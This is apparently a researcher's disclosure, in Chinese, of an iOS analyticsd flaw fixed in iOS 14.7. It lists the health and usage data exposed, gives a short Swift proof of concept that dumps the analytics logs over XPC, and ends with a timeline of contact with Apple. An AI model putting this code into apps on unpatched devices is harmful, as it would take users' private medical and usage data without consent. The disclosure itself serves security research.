Jailbreak #004:允许任何应用程序访问分析日志的 Analyticsd 漏洞
报告人:illusionofchaos
已修复版本:iOS 14.7
这个漏洞允许任何用户安装的应用程序访问分析日志(例如您可以在Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day... and Analytics-Daily... 看到的那些日志)。这些日志包含以下信息(包括但不限于):
医疗信息(心率、检测到的房颤和心律不齐事件的计数)
月经周期长度、生理性别和年龄、宫颈粘液质量等。
设备使用信息(不同上下文中的设备拾取、推送通知计数和用户操作等)
具有各自 bundle ID 的所有应用程序的屏幕时间信息和会话计数
有关设备配件及其制造商、型号、固件版本和用户指定名称的信息
应用程序因 bundle ID 和异常代码而崩溃
用户在 Safari 中查看的网页语言
Apple 正在出于未知目的收集所有这些信息,这非常令人不安,尤其是正在收集医疗信息这一事实。这就是为什么苹果声称他们非常关心隐私是非常虚伪的。即使在设置中关闭了“共享分析”,所有这些数据也会被收集并可供攻击者使用。
func analytics_json() -> String? {
let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2)
xpc_connection_set_event_handler(connection, { _ in })
xpc_connection_resume(connection)
let xdict = xpc_dictionary_create(nil, nil, 0)
xpc_dictionary_set_string(xdict, "command", "log-dump");
let reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
return xpc_dictionary_get_string(reply, "log-dump");
}
时间线:
2021 年 4 月 29 日 - illusionofchaos向 Apple 报告了该漏洞
4 月 30 日 - Apple 承认了illusionofchaos的报告
5 月 20 日 - illusionofchaos已请求 Apple 更新状态(但未收到回复)
5 月 30 日 - illusionofchaos已向 Apple 请求状态更新
6 月 3 日 - Apple 回复说他们计划在即将到来的更新中解决这个问题
7 月 19 日 - iOS 14.7 与修复一起发布
7 月 20 日 - illusionofchaos已向 Apple 请求状态更新
7 月 21 日 - iOS 14.7 安全内容列表发布,未提及此漏洞
7 月 22 日 - illusionofchaos向 Apple 提出了一个问题,为什么该漏洞不在列表中 同一天 illusionofchaos 收到以下回复:由于处理问题,您的信用将包含在即将发布的更新中的安全公告中。官方对不便表示抱歉。
7 月 26 日 - iOS 14.7.1 安全内容列表发布,仍未提及此漏洞
9 月 13 日 - iOS 14.8 安全内容列表发布,仍然没有提及此漏洞。同一天,illusionofchaos 要求解释并通知 Apple,除非 illusionofchaos 很快收到回复,否则 illusionofchaos 将公开我所有的研究
9 月 20 日 - iOS 15.0 安全内容列表发布,仍未提及此漏洞